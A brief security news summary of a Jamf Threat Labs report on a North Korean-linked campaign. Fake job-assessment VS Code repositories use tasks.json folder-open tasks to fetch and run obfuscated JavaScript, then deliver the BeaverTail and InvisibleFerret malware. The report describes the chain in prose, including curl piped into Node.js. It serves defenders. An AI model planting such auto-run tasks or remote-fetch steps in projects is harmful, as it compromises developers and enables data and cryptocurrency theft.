A technical report by Jamf Threat Labs noted that North Korean linked threat actors used malicious Microsoft Visual Studio Code projects as lures to deliver a backdoor that provides remote code execution when targets open cloned repositories in VS Code.
KEY FACTS
- Incident Malicious VS Code projects execute code when a project folder is opened
- Technique Abuse of VS Code tasks.json with runOn: folderOpen to fetch and run payloads
- Payloads Node.js and Python components named BeaverTail and InvisibleFerret
- Targets Software engineers, especially in crypto, blockchain, and fintech
The attack uses VS Code task configuration files to run obfuscated JavaScript as soon as a cloned project is opened in the integrated development environment. The JavaScript contacts a remote server and executes additional code that is staged on a Vercel domain.
On macOS the chain can start a background shell command using nohup bash -c combined with curl to pipe a JavaScript payload directly into the Node.js runtime. The payload can run independently of the VS Code process and establish a persistent execution loop that harvests basic host information and accepts remote commands.
The campaign delivers Node.js and Python components named BeaverTail and InvisibleFerret. Delivered functionality includes keystroke logging, screenshots, home directory scans for sensitive files, clipboard wallet address substitution, and an XMRig cryptocurrency miner, with AnyDesk used for remote access in some cases.
The lures instruct targets to clone repositories hosted on Git platforms and open the projects as part of a purported job assessment. Multiple fallback mechanisms are used, including a malicious npm dependency and multi stage droppers, to increase the likelihood of successful compromise.
WHY IT MATTERS
The technique exploits normal developer workflows to run code automatically when projects are opened, increasing the risk to engineers who clone repositories from unknown authors. Successful execution can provide persistent remote access and enable data theft or financial theft.